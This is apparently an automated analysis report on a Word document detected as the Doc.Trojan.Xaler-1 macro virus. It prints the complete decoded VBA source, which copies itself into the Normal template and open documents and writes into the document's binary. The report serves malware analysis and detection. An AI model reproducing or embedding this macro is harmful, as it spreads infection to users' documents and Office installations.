Office (OLE) malware analysis — malicious · 5b89b0fc6e5a2b56

MALICIOUS

Office (OLE)

353.5 KB Created: 2012-09-24 05:01:00 Authoring application: Microsoft Office Word First seen: 2015-10-02

MD5: d54bcad088e8ed24bac94d5f12be06a0 SHA-1: 34b0511e8bc7f65bbf1313d38a91c7649c76095c SHA-256: 5b89b0fc6e5a2b568a41db9a61a8a79c5a89f0e50bf53888d6b356a3c26166eb

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a Word document containing VBA macros. The 'Document_Open' and 'Document_Close' subroutines trigger the 'GOODSub' function, which attempts to export and re-insert VBA code into the Normal template and the active document. This self-replication behavior, along with the ClamAV detection 'Doc.Trojan.Xaler-1', strongly suggests malicious intent, likely for persistence or to spread the macro. The macro also attempts to tamper with AV by writing to the document's binary data.

Heuristics 5

ClamAV: Doc.Trojan.Xaler-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Xaler-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
NormalTemplate.VBProject.VBComponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2761 bytes
SHA-256: `192d4e7314bc9bb354b649a1fdecb6c69b5551207ef8f1ad76f87b21f9af9188`
Detection ClamAV: Doc.Trojan.Xaler-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'RELAX Private Sub RELAX2() End End Sub Private Sub Document_Close() Call GOODSub Call RELAX2 End Sub Private Sub GOODSub() On Error Resume Next Application.ScreenUpdating = False Application.Options.SaveNormalPrompt = False x$ = "C:\temp.tmp" MacroContainer.VBProject.VBComponents.Item("ThisDocument").Export x$ Open x$ For Input As #1 keimeno = Input(LOF(1), 1) Close #1 kk& = InStr(1, keimeno, "'RELAX") keimeno = Right$(keimeno, Len(keimeno) - kk& + 1) For j = 1 To 2 If j = 1 Then NormalTemplate.VBProject.VBComponents.Item("ThisDocument").Export x$ Else ActiveDocument.VBProject.VBComponents.Item("ThisDocument").Export x$ End If Open x$ For Input As #1 rlx = Input(LOF(1), 1) Close #1 d1 = InStr(1, rlx, "'RELAX") If d1 = 0 Then If j = 1 Then NormalTemplate.VBProject.VBComponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno NormalTemplate.Save Else ActiveDocument.VBProject.VBComponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno End If End If Next j '==================== Dim PRostasia As Byte PRostasia = 1 fff = FreeFile If Dir(ActiveDocument.FullName, 6) <> "" Then Open ActiveDocument.FullName For Binary As #fff Put #fff, 862, PRostasia Close #fff ActiveDocument.Save End If Kill x$ Application.ScreenUpdating = True End Sub Private Sub Document_Open() Call GOODSub End Sub 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo 'qexdo

Open this report in the interactive analyzer, or submit your own file for analysis.